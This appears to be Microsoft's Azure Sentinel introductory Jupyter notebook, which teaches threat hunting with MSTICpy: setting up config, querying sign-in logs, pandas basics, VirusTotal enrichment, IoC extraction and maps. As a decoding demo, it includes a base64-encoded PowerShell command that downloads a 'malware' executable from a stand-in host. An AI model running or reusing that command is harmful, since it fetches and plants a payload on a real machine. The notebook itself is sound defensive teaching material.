Notebook Version: 1.0
Python Version: Python 3.6 (including Python 3.6 - AzureML)
Required Packages:
Platforms Supported:
Data Sources Required:
This notebook takes you through the basics needed to get started with Azure Notebooks and Azure Sentinel, and how to perform the basic actions of data acquisition, data enrichment, data analysis, and data visualization. These actions are the building blocks of threat hunting with notebooks and are useful to understand before running more complex notebooks. This notebook only lightly covers each topic but includes 'learn more' sections to provide you with the resource to deep dive into each of these topics.
This notebook assumes that you are running this in an Azure Notebooks environment, however it will work in other Jupyter environments.
Note: This notebooks uses SigninLogs from your Azure Sentinel Workspace. If you are not yet collecting SigninLogs configure this connector in the Azure Sentinel portal before running this notebook. This notebook also uses the VirusTotal API for data enrichment, for this you will require an API key which can be obtained by signing up for a free VirusTotal community account
You are currently reading a Jupyter notebook. Jupyter is an interactive development and data manipulation environment presented in a browser. Using Jupyter you can create documents, called Notebooks. These documents are made up of cells that contain interactive code, alongside that code's output, and other items such as text and images (what you are looking at now is a cell of Markdown text).
The name, Jupyter, comes from the core supported programming languages that it supports: Julia, Python, and R. Whilst you can use any of these languages we are going to use Python in this notebook, in addition the notebooks that come with Azure Sentinel are all written in Python. Whilst there are pros, and cons to each language Python is a well-established language that has a large number of materials and libraries well suited for data analysis and security investigation, making it ideal for our needs.
To use a Jupyter notebook you need a Jupyter server that will render the notebook and execute the code within it. This can take the form of a local Jupyter installation, or a remotely hosted version such as Azure Notebooks. If you are reading this it is highly likely that you already have a Jupyter server that this notebook is using. You can learn more about installing and running your own Jupyter server here.
If you accessed this notebook from Azure Sentinel, you are probably using Azure Notebooks to run this notebook. Azure Notebooks runs in the same way that a local Jupyter server with, except with the additional feature of integrated project management and file storage. When you open a notebook in Azure Notebooks the user interface is nearly identical to a standard Jupyter notebook experience.
Before you can start running code in a notebook you need to make sure that it is connected to a Jupyter server and you have the correct type of kernel configured. For this notebook we are going to be using Python 3.6, hopefully Azure Notebooks has already loaded this kernel for you - you can check this by looking at the top left corner of the screen where you should see the currently connected kernel.
If this does not read Python 3.6 you can select the correct kernel by selecting Kernel > Change kernel from the top menu and clicking Python 3.6.
Note: the notebook works with Python 3.6, 3.7 or later. If you are using this notebook in Azure ML or another Jupyter environment you can choose any kernel that supports Python 3.6 or later
Once you have done this you should be ready to move onto a code cell.
Tip: You can identify which cells are code by selecting them and looking at the drop down box at the center of the top menu. It will either read 'Code' (for interactive code cells), 'Markdown' (for Markdown text cells like this one), or RawNBConvert (these are just raw data and not interpreted by Jupyter - they can be used by tools that process notebook files, such as nbconvert to render the data into HTML or LaTeX).
If you click on the cell below you should see this box change to 'Code'.
More details on Azure Notebooks can be found in the Azure Notebooks documentation and the Azure Sentinel documentation.
Once you have selected a code cell you can run it by clicking the run button at the menu bar at the top, or by pressing Ctrl+Enter.
# This is our first code cell, it contains basic Python code.
# You can run a code cell by selecting it and clicking the Run button in the top menu, or by pressing Shift + Enter.
# Once you run a code cell any output from that code will be displayed directly below it.
print("Congratulations you just ran this code cell")
y = 2+2
print("2 + 2 =", y)
Variables set within a code cell persist between cells meaning you can chain cells together
y + 2
Now that you understand the basics we can move onto more complex code.
Code cells behave in the same way your code would in other environments, so you need to remember about common coding practices such as variable initialization and library imports. Before we execute more complex code we need to make sure the required packages are installed and libraries imported. At the top of many of the Azure Sentinel notebooks you will see large cells that will check kernel versions and then install and import all the libraries we are going to be using in the notebook, make sure you run this before running other cells in the notebook. If you are running notebooks locally or via dedicated compute in Azure Notebooks library installs will persist but this is not the case with Azure Notebooks free tier, so you will need to install each time you run. Even if running in a static environment imports are required for each run so make sure you run this cell regardless.
from pathlib import Path
import os
import sys
import warnings
from IPython.display import display, HTML, Markdown
REQ_PYTHON_VER=(3, 6)
REQ_MSTICPY_VER=(0, 6, 0)
display(HTML("<h3>Starting Notebook setup...</h3>"))
# If you did not clone the entire Azure-Sentinel-Notebooks repo you may not have this file
if Path("./utils/nb_check.py").is_file():
from utils.nb_check import check_python_ver, check_mp_ver
check_python_ver(min_py_ver=REQ_PYTHON_VER)
try:
check_mp_ver(min_msticpy_ver=REQ_MSTICPY_VER)
except ImportError:
!pip install --upgrade msticpy
if "msticpy" in sys.modules:
importlib.reload(sys.modules["msticpy"])
else:
import msticpy
check_mp_ver(REQ_MSTICPY_VER)
from msticpy.nbtools import nbinit
nbinit.init_notebook(
namespace=globals(),
extra_imports=["ipwhois, IPWhois", "urllib.request, urlretrieve", "yaml"]
)
Once we have set up our Jupyter environment with the libraries that we'll use in the notebook, we need to make sure we have some configuration in place. Some of the notebook components need addtional configuration to connect to external services (e.g. API keys to retrieve Threat Intelligence data). This includes configuration for connection to our Azure Sentinel workspace, as well as some threat intelligence providers we will use later.
The easiest way to handle the configuration for these services is to store them in a msticpyconfig file (msticpyconfig.yaml
). More details on msticpyconfig can be found here: https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html
The Azure-Sentinel-Notebooks GitHub repo contains an template msticpyconfig file ready to be populated. If you have run this notebook before you may have a msticpyconfig file already populated, the cell below allows you to checks if this file. If your config file does not contain details under Azure Sentinel > Workspaces, or TIProviders the following cells will populate these for you.
If you want to see an example of what a populated msticpyconfig file should look like a samples is included in the repo as msticpyconfig-sample.yaml.
import yaml
def print_config():
with open('msticpyconfig.yaml') as f:
data = yaml.load(f, Loader=yaml.FullLoader)
print(yaml.dump(data))
try:
print_config()
except FileNotFoundError:
print("No msticpyconfig.yaml was found in your current directory.")
print("We are downloading a template file for you.")
urlretrieve("https://raw.githubusercontent.com/Azure/Azure-Sentinel-Notebooks/master/msticpyconfig.yaml", "msticpyconfig.yaml")
print_config()
If you do not have and msticpyconfig file we can populate one for you. Before you do this you will need a few things.
The first is the Workspace ID and Tenant ID of the Azure Sentinel Workspace you wish to connect to.
You can get the workspace ID by opening Azure Sentinel in the Azure Portal and selecting Settings > Workspace Settings. Your Workspace ID is displayed near the top of this page.
You can get your tenant ID (also referred to organization or directory ID) via Azure Active Directory
We are going to use VirusTotal to enrich our Azure Sentinel data. For this you will need a VirusTotal API key, one of these can be obtained for free (as a personnal key) via the VirusTotal website.
We are using VirusTotal for this notebook but we also support a range of other threat intelligence providers: https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html
In addition we are going to plot IP address locations on a map, in order to do this we are going to use MaxMind to geolocate IP addresses which requires an API key. You can sign up for a free account and API key at https://www.maxmind.com/en/geolite2/signup.
Once you have these required items run the cell below and you will prompted to enter these elements:
ws_id = nbwidgets.GetEnvironmentKey(env_var='WORKSPACE_ID',
prompt='Please enter your Log Analytics Workspace Id:', auto_display=True)
ten_id = nbwidgets.GetEnvironmentKey(env_var='TENANT_ID',
prompt='Please enter your Log Analytics Tenant Id:', auto_display=True)
vt_key = nbwidgets.GetEnvironmentKey(env_var='VT_KEY',
prompt='Please enter your VirusTotal API Key:', auto_display=True)
mm_key = nbwidgets.GetEnvironmentKey(env_var='MM_KEY',
prompt='Please enter your MaxMind API Key:', auto_display=True)
The cell below will now populate a msticpyconfig file with these values:
with open("msticpyconfig.yaml") as config:
data = yaml.load(config, Loader=yaml.Loader)
data['AzureSentinel']
workspace = {"Default":{"WorkspaceId": ws_id.value, "TenantId": ten_id.value}}
ti = {"VirusTotal":{"Args": {"AuthKey" : vt_key.value}, "Primary" : True, "Provider": "VirusTotal"}}
other_prov = {"GeoIPLite" : {"Args" : {"AuthKey" : mm_key.value, "DBFolder" : "~/msticpy"}, "Provider" : "GeoLiteLookup"}}
data['AzureSentinel']['Workspaces'] = workspace
data['TIProviders'] = ti
data['OtherProviders'] = other_prov
with open("msticpyconfig.yaml", 'w') as config:
yaml.dump(data, config)
print("msticpyconfig.yaml updated")
We can now validate our configuration is correct.
from msticpy.common.pkg_config import refresh_config, validate_config
refresh_config()
validate_config()
Note you may see warnings for missing providers when running this cell. This is not an issue as we will not be using all providers in this notebook so long as you get thie message "No errors found." you are OK to proceed.
Now that we have configured the details necessary to connect to Azure Sentinel we can go ahead and get some data. We will do this with QueryProvider()
from MSTICpy.
You can use the QueryProvider
class to connect to different data sources such as MDATP, the Security Graph API, and the one we will use here, Azure Sentinel.
For now, we are going to set up a QueryProvider for Azure Sentinel, pass it the details for our workspace that we just stored in the msticpyconfig file, and connect. The connection process will ask us to authenticate to our Azure Sentinel workspace via device authorization with our Azure credentials. You can do this by clicking the device login code button that appears as the output of the next cell, or by navigating to https://microsoft.com/devicelogin and manually entering the code. Note that this authentication persists with the kernel you are using with the notebook, so if you restart the kernel you will need to re-authenticate.
# Initalize a QueryProvider for Azure Sentinel
qry_prov = QueryProvider("LogAnalytics")
# Get the Azure Sentinel workspace details from msticpyconfig
try:
ws_config = WorkspaceConfig()
md("Workspace details collected from config file")
except:
raise Exception("No workspace settings are configured, please run the cells above to configure these.")
# Connect to Azure Sentinel with our QueryProvider and config details
# ws_config.code_connect_str is a feature of MSTICpy that creates the required connection string from details in our msticpyconfig
qry_prov.connect(connection_str=ws_config.code_connect_str)
Now that we have connected we can query Azure Sentinel for data, but before we do that we need to understand what data is avalaible to query. The QueryProvider object provides a way to get a list of tables as well as tables and table columns:
# Get list of tables in our Workspace
display(qry_prov.schema_tables [:5]) # We are outputting only the first 5 tables for brevity
# Get list of tables and thier columns
qry_prov.schema['SigninLogs'] # We are only displaying the columns for SigninLogs for brevity
MSTICpy includes a number of built in queries that you can run.
You can list available queries with .list_queries() and get specific details about a query by calling it with "?" as a parameter
# Get a list of avaliable queries
qry_prov.list_queries()
# Get details about a query
qry_prov.Azure.list_all_signins_geo("?")
You can then run the query by calling it with the required parameters:
from datetime import datetime, timedelta
# set our query end time as now
end = datetime.now()
# set our query start time as 1 hour ago
start = end - timedelta(hours=1)
# run query with specified start and end times
logons_df = qry_prov.Azure.list_all_signins_geo(start=start, end=end)
# display first 5 rows of any results
logons_df.head() # If you have no data you will just see the column headings displayed
Another way to run queries is to pass a string format of a KQL query to the query provider, this will run the query against the workspace connected to above, and will return the data in a Pandas DataFrame. We will look at working with Pandas in a bit more detail later.
# Define our query
test_query = """
SigninLogs
| where TimeGenerated > ago(7d)
| take 10
"""
# Pass that query to our QueryProvider
test_df = qry_prov.exec_query(test_query)
# Check that we have some data
if isinstance(test_df, pd.DataFrame) and not test_df.empty:
# .head() returns the first 5 rows of our results DataFrame
display(test_df.head())
# If where is no data load some sample data to use instead
else:
md("You don't appear to have any SigninLogs - we will load sample data for you to use.")
if not Path("nbdemo/data/aad_logons.pkl").exists():
Path("nbdemo/data/").mkdir(parents=True, exist_ok=True)
urlretrieve('https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/nbdemo/data/aad_logons.pkl?raw=true', 'nbdemo/data/aad_logons.pkl')
urlretrieve('https://raw.githubusercontent.com/Azure/Azure-Sentinel-Notebooks/master/nbdemo/data/queries.yaml', 'nbdemo/data/queries.yaml')
qry_prov = QueryProvider("LocalData", data_paths=["nbdemo/data/"], query_paths=["nbdemo/data/"])
logons_df = qry_prov.Azure.list_all_signins_geo()
display(logons_df.head())
Our query results are returned in the form of a Pandas DataFrame. DataFrames are a core component of the Azure Sentinel notebooks and of MSTICpy and is used for both input and output formats. Pandas DataFrames are incredibly versitile data structures with a lot of useful features, we will cover a small number of them here and we recommend that you check out the Learn more section to learn more about Pandas features.
# For this section we are going to create a DataFrame from data we have saved in a csv file
df = pd.read_csv("https://raw.githubusercontent.com/microsoft/msticpy/master/tests/testdata/host_logons.csv", index_col=[0] )
# Display our DataFrame
df # or display(df)
Note if the dataframe variable (
df
in the example above) is the last statement in a code cell, Jupyter will automatically display it without using thedisplay()
function. However, if you want to display a DataFrame in the middle of other code in a cell you must use thedisplay()
function.
You may not want to display the whole DataFrame and instead display only a selection of items. There are numerous ways to do this and the cell below shows some of the most widely used functions.
md("Display the first 2 rows using head(): ", "bold")
display(df.head(2)) # we don't need to call display here but just for illustration
md("Display the 3rd row using iloc[]: ", "bold")
df.iloc[3]
md("Show the column names in the DataFrame ", "bold")
df.columns
md("Display just the TimeGenerated and TenantId columnns: ", "bold")
df[["TimeGenerated", "TenantId"]]
We can also choose to select a subsection of our DataFrame based on the contents of the DataFrame:
Tip: the syntax in these examples is using a technique called boolean indexing.
df[<boolean expression>]
returns all rows in the dataframe where the boolean expression is True
In the first example we telling pandas to return all rows where the column value of 'TargetUserName' matches 'MSTICAdmin'
md("Display only rows where TargetUserName value is 'MSTICAdmin': ", "bold")
df[df['TargetUserName']=="MSTICAdmin"]
md("Display rows where TargetUserName is either MSTICAdmin or adm1nistratror:", "bold")
display(df[df['TargetUserName'].isin(['adm1nistrator', 'MSTICAdmin'])])
Our DataFrame call also be extended to add new columns with additional data if reqired:
df["NewCol"] = "Look at my new data!"
display(df[["TenantId","Account", "TimeGenerated", "NewCol"]].head(2))
There is a lot more you can do with Pandas, the links below provide some useful resources:
Now that we have seen how to query for data, and do some basic manipulation we can look at enriching this data with additional data sources. For this we are going to use an external threat intelligence provider to give us some more details about an IP address we have in our dataset using the MSTICpy TIProvider feature.
from datetime import datetime, timedelta
# Check if we have logon data already and if not get some
if not isinstance(logons_df, pd.DataFrame) or logons_df.empty:
# set our query end time as now
end = datetime.now()
# set our query start time as 1 hour ago
start = end - timedelta(days=1)
# run query with specified start and end times
logons_df = qry_prov.Azure.list_all_signins_geo(start=start, end=end)
# Create our TI provider
ti = TILookup()
# Get the first logon IP address from our dataset
ip = logons_df.iloc[1]['IPAddress']
# Look up the IP in VirusTotal
ti_resp = ti.lookup_ioc(ip, providers=["VirusTotal"])
# Format our results as a DataFrame
ti_resp = ti.result_to_df(ti_resp)
display(ti_resp)
Using the Pandas apply() feature we can get results for all the IP addresses in our data set and add the lookup severity score as a new column in our DataFrame for easier reference.
# Take the IP address in each row, look it up against TI and return the seveirty score
def lookup_res(row):
ip = row['IPAddress']
resp = ti.lookup_ioc(ip, providers=["VirusTotal"])
resp = ti.result_to_df(resp)
return resp["Severity"].iloc[0]
# Take the first 3 rows of data and copy they into a new DataFrame
enrich_logons_df = logons_df.iloc[:3].copy()
# Create a new column called TIRisk and populate that with the TI severity score of the IP Address in that row
enrich_logons_df['TIRisk'] = enrich_logons_df.apply(lookup_res, axis=1)
# Display a subset of columns from our DataFrame
enrich_logons_df[["TimeGenerated", "ResultType", "UserPrincipalName", "IPAddress", "TIRisk"]]
MSTICpy includes further threat intelligence capabilities as well as other data enrichment options. More details on these can be found in the documentation.
With the data we have collected we may wish to perform some analysis on it in order to better understand it. MSTICpy includes a number of features to help with this, and there are a vast array of other data analysis capabilities available via Python ranging from simple processes to complex ML models. We will start here by keeping it simple and look at how we can decode some Base64 encoded command line strings we have in order to allow us to understand their content.
from msticpy.sectools import base64unpack as b64
# Take our encoded Powershell Command
b64_cmd = "powershell.exe -encodedCommand SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jb250b3NvLmNvbS9tYWx3YXJlIC1PdXRGaWxlIEM6XG1hbHdhcmUuZXhl"
# Unpack the Base64 encoded elements
unpack_txt = b64.unpack(input_string=b64_cmd)
# Display our results and transform for easier reading
unpack_txt[1].T
We can also use MSTICpy to extract Indicators of Compromise (IoCs) from a dataset, this makes it easy to extract and match on a set of IoCs within our data. In the example below we take a US Cybersecurity & Infrastructure Security Agency (CISA) report and extract all domains listed in the report:
import requests
# Set up our IoCExtract oject
ioc_extractor = iocextract.IoCExtract()
# Download our threat report
data = requests.get("https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml")
# Extract domains listed in our report
iocs = ioc_extractor.extract(data.text, ioc_types="dns")['dns']
# Display the first 5 iocs found in our report
list(iocs)[:5]
There are a wide range of options when it comes to data analysis in notebooks using Python. Here are some useful resources to get you started:
Visualizing data can provide an excellent way to analyse data, identify patterns and anomalies. Python has a wide range of data visualization capabilities each of which have thier own benefits and drawbacks. We will look at some basic capabilities as well as the in-build visualizations in MSTICpy.
Basic Graphs
Pandas and Matplotlib provide the easiest and simplest way to produce simple plots of data:
vis_q = """
SigninLogs
| where TimeGenerated > ago(7d)
| sample 5"""
# Try and query for data but if using sample data load that instead
try:
vis_data = qry_prov.exec_query(vis_q)
except FileNotFoundError:
vis_data = logons_df
# Check we have some data in our results and if not use previously used dataset
if not isinstance(vis_data, pd.DataFrame) or vis_data.empty:
vis_data = logons_df
# Plot up to the first 5 IP addresses
vis_data.head()['IPAddress'].value_counts().plot.bar(title="IP prevelence", legend=False)
pie_df = vis_data.copy()
# If we have lots of data just plot the first 5 rows
pie_df.head()['IPAddress'].value_counts().plot.pie(legend=True)
Bokeh is a powerful visualization library that allows you to create complex, interactive visualizations. MSTICpy includes a number of pre-built visualizations using Bokeh including a timeline feature that can be used to represent events over time. You can interact with the timeline by zooming and panning, using the range selector, as well as hovering over data points to see more details.
from datetime import datetime, timedelta
# Check if we have logon data already and if not get some
if not isinstance(logons_df, pd.DataFrame) or logons_df.empty:
# set our query end time as now
end = datetime.now()
# set our query start time as 1 hour ago
start = end - timedelta(days=1)
# run query with specified start and end times
logons_df = qry_prov.Azure.list_all_signins_geo(start=start, end=end)
display(timeline.display_timeline(logons_df.head(10), source_columns=["TimeGenerated", "ResultType", "UserPrincipalName", "IPAddress"], group_by="AppDisplayName"))
MSTICpy also includes a feature to allow you to map locations, this can be particularily useful when looking at the distribution of remote network connections or other events. Below we plot the locations of remote logons observed in our Azure AD data.
from msticpy.sectools.ip_utils import convert_to_ip_entities
from msticpy.nbtools.foliummap import FoliumMap, get_map_center
# Convert our IP addresses in string format into an ip address entity
ip_entity = entityschema.IpAddress()
ip_list = [convert_to_ip_entities(i)[0] for i in logons_df['IPAddress'].head(10)]
# Get center location of all IP locaitons to center the map on
location = get_map_center(ip_list)
logon_map = FoliumMap(location=location, zoom_start=4)
# Add location markers to our map and dsiplay it
if len(ip_list) > 0:
logon_map.add_ip_cluster(ip_entities=ip_list)
display(logon_map.folium_map)
This notebook has showed you the basics of using notebooks and Azure Sentinel for security investigaitons. There are many more things possible using notebooks and it is stronly encouraged to read the material we have referenced in the learn more sections in this notebook. You can also explore the other Azure Sentinel notebooks in order to take advantage of the pre-built hunting logic, and understand other analysis techniques that are possible.